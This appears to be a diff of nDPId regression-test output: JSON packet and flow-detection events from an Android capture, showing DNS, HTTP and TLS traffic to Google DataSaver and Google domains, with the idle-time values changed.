+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454871781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871781,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8S\/EAAHUGde+s2RRKwKgCEAG7zSLiUVJTDpwh4qAS6yCWYgAAAgQFZAQCCAoTCsRq\/\/83agEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1582454871784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871784,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8QWIAAGcGUm2twk9ywKgCEABQj\/AL32zY1y9aNKAS87jv8AAAAgQFlgQCCArQ72G\/\/\/83awEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454871786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871786,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0FoxAAEAGoFzAqAIQrNkUSs0iAbsOnCHi4lFSVIAQAVeungAAAQEICv\/\/N3UTCsRq"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1582454871804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871804,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGrB5AAEARCSfAqAIQwKgCAUfLADUAMmcLPGQBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1582454871805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871805,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWsEQAAEARRPHAqAIBwKgCEAA1R8sAQmKIPGSBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1582454871823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871823,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrCJAAEARCSjAqAIQwKgCASm1ADUALW7k1fkBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -273,63 +273,63 @@ 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1582454871827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871827,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMd48AAEARfbDAqAIBwKgCEAA1gEAAOLeFcqOBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871839,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8witAAEAGtnDAqAIQ2O8meID2AbsYfvWoAAAAAKAC\/\/+9gwAAAgQFtAQCCAr\/\/zeDAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1582454871848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871848,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8oe8AAHYGHXGs2RXKwKgCEAG7yuig7Cw9QmE\/LaAS6yAtmgAAAgQFZAQCCArvemfU\/\/83fQEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1582454871853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871853,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CFJAAEAGrRbAqAIQrNkVysroAbtCYT8toOwsPoAQAVdF2AAAAQEICv\/\/N4bvemfU"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1582454871853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871853,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AF8AAHUGgz3Y7yZ4wKgCEAG7gPZMYENyGH71qaAS6yCi0QAAAgQFZAQCCArDx9w1\/\/83gwEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1582454871839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871839,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8witAAEAGtnDAqAIQ2O8meID2AbsYfvWoAAAAAKAC\/\/+9gwAAAgQFtAQCCAr\/\/zeDAAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1582454871848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871848,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8oe8AAHYGHXGs2RXKwKgCEAG7yuig7Cw9QmE\/LaAS6yAtmgAAAgQFZAQCCArvemfU\/\/83fQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1582454871853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871853,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CFJAAEAGrRbAqAIQrNkVysroAbtCYT8toOwsPoAQAVdF2AAAAQEICv\/\/N4bvemfU"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1582454871853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871853,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AF8AAHUGgz3Y7yZ4wKgCEAG7gPZMYENyGH71qaAS6yCi0QAAAgQFZAQCCArDx9w1\/\/83gwEDAwg="} 